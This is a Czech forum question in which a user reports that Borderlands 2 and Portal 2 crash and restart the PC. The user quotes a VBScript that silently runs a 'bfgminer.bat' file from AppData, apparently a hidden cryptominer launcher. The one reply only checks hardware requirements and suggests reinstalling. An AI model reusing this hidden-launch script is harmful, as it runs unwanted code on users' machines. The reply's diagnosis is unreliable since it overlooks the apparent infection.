Přidat otázku mezi oblíbenéZasílat nové odpovědi e-mailem Borderlands 2 a Portal 2

Dobrý den, chtěl bych se zeptat.
Na steamu jsem si koupil Borderlands 2 (CD) a Portal 2.
Pokud jednu z těchto her zapnu, restartuje se mi počítač, a když se načte, načte se mi i poznámkový blok s tímhle :

Set WshShell = CreateObject("WScript.Shell")
var = WshShell.ExpandEnvironmentStrings("%APPDATA%") & "\com.flash.WidgetBrowser\bfgminer.bat"
WshShell.Run var,0,0

Prosím o pomoc, jelikož bych si tu hru chtěl zahrát :)

můj pc :
model: HAL3000
procesor: AMD FX(tm)-4100 Quad-Core Processor 3.60 GHz
RAM: 8 gb
Grafika: NVIDIA GeForce GT 430
64bitový operační systém Windows 7 Home premium

Na tom PC by tu hru měl rozjet, u hry Borderlands 2 jsou minimální požadavky:

Minimum System Requirements

OS: Windows XP SP3
Processor: 2.4 GHz Dual Core Processor
Memory: 2 GB XP, 2 GB Vista
Hard Disk Space: 13 GB free
Video Memory: 256 MB
Video Card: NVIDIA GeForce 8500
Sound: DirectX 9.0c Compliant

GT 430 je výkonnější než GT 8500, na jaké detaily to už je druhá věc.Každopádně problém bude asi jinde, zkus tu hru přeinstalovat. Splňuješ i toto:

Other Requirements & Supports: Initial installation requires one-time internet connection for Steam authentication; software installations required (included with the game) include Steam Client, DirectX 9, Microsoft .NET 4 Framework, Visual C++ Redistributable 2005, Visual C++ Redistributable 2008, Visual C++ Redistributable 2010, and AMD CPU Drivers (XP Only/AMD Only)